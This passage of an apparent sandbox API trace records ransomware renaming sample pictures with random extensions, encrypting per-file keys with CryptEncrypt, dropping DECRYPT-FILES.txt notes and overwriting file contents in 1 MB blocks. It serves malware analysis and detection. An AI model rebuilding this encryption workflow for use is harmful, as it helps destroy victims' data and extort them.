lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.123] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 58 [0089.123] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.ozcBX") returned 64 [0089.123] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.ozcBX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.ozcbx"), dwFlags=0x0) returned 1 [0089.124] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.125] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.125] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.125] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.153] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.153] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.154] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.154] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 51 [0089.154] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.sFGQeH") returned 58 [0089.154] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.sFGQeH" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.sfgqeh"), dwFlags=0x0) returned 1 [0089.155] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.157] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.157] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.157] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.176] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.177] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.178] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.178] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 55 [0089.178] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bycJvvS") returned 63 [0089.178] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bycJvvS" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.bycjvvs"), dwFlags=0x0) returned 1 [0089.178] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.180] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.180] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.180] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.206] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.206] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.207] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.207] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 54 [0089.207] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.QmoB") returned 59 [0089.207] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.QmoB" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.qmob"), dwFlags=0x0) returned 1 [0089.208] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.208] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.209] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.209] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.209] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.238] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.238] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.239] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.239] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 50 [0089.239] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.7L66R") returned 56 [0089.239] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.7L66R" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.7l66r"), dwFlags=0x0) returned 1 [0089.240] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.242] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.242] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.242] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.262] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.262] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.263] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.263] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 55 [0089.263] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.0wfrVn") returned 62 [0089.263] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.0wfrVn" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.0wfrvn"), dwFlags=0x0) returned 1 [0089.264] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.265] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.265] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.265] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.293] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.293] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.294] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.294] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 53 [0089.294] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.nRSImkw") returned 61 [0089.294] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.nRSImkw" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.nrsimkw"), dwFlags=0x0) returned 1 [0089.295] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.296] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.296] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.296] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.318] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.318] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.319] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.319] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 51 [0089.319] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.gzK7") returned 56 [0089.319] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.gzK7" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.gzk7"), dwFlags=0x0) returned 1 [0089.320] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\\\jkbimi8.tmp") returned 40 [0089.320] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\recorded tv\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0089.321] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\") returned 28 [0089.321] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0089.321] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\\\DECRYPT-FILES.txt") returned 46 [0089.321] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0089.323] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0089.324] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Recorded TV\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0089.324] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\jkbimi8.tmp") returned 53 [0089.324] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\recorded tv\\sample media\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0089.325] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 41 [0089.325] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0089.325] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\DECRYPT-FILES.txt") returned 59 [0089.325] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\sample media\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0089.326] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0089.328] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0089.328] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0089.328] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.328] ReadFile (in: hFile=0x428, lpBuffer=0x3f2dd04, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x3f2dd00, lpOverlapped=0x0 | out: lpBuffer=0x3f2dd04*, lpNumberOfBytesRead=0x3f2dd00*=0x108, lpOverlapped=0x0) returned 1 [0089.330] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.330] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.330] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.330] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f2dcf8*, pdwDataLen=0x3f2dce4*=0x28, dwBufLen=0x100 | out: pbData=0x3f2dcf8*, pdwDataLen=0x3f2dce4*=0x100) returned 1 [0089.363] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.363] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.366] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.385] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.386] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.388] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.416] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.416] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.418] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.437] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.437] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.440] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.465] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.465] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.467] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.492] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.493] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.505] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.519] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.519] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.521] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.533] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.533] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.535] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.547] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.548] WriteFile 